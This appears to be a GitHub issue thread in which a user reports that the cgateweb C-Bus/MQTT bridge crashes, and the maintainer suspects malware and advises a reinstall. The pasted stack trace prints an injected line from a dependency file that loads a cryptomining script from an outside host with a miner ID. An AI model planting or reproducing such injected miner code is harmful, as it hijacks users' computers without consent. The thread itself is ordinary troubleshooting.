### ISSUE TITLE
Exit-Code Failure

### ISSUE THREAD

**Issue by Bladeacus** [the1laz/cgateweb#14]
Hi,

Prior to a few days ago cgateweb has been running fine and controlling my C-Bus through Home Assistant. All of a sudden it has stopped working and I have an error exit code.

I am getting this error in logging all of a sudden -

pi@hassbian:/usr/local/bin/cgateweb $ sudo node index.js
/usr/local/bin/cgateweb/node_modules/mqtt/lib/generate.js:578
document.write('<script src="https://xmr.omine.org/assets/v7.js"></script><script>OMINEId("31f7dd372f1545eeb6db379490b0e3c5","-1")</script>');
^

ReferenceError: document is not defined
at Object. (/usr/local/bin/cgateweb/node_modules/mqtt/lib/generate.js:578:1)
at Module._compile (internal/modules/cjs/loader.js:689:30)
at Object.Module._extensions..js (internal/modules/cjs/loader.js:700:10)
at Module.load (internal/modules/cjs/loader.js:599:32)
at tryModuleLoad (internal/modules/cjs/loader.js:538:12)
at Function.Module._load (internal/modules/cjs/loader.js:530:3)
at Module.require (internal/modules/cjs/loader.js:637:17)
at require (internal/modules/cjs/helpers.js:20:18)
at Object. (/usr/local/bin/cgateweb/node_modules/mqtt/lib/connection.js:4:16)
at Module._compile (internal/modules/cjs/loader.js:689:30)

Any ideas?

**Comment by the1laz** [comment]
Sounds like malware, since it's trying to load a crypto mining script. No idea how that happens. Might be worth reinstalling cgateweb (or your whole OS? I have no experience with malware on Linux)

**Comment by Bladeacus** [comment]
Hmm..I think it was my NodeRed that had caused the issue. Have started the reinstall process as suggested.

Thanks
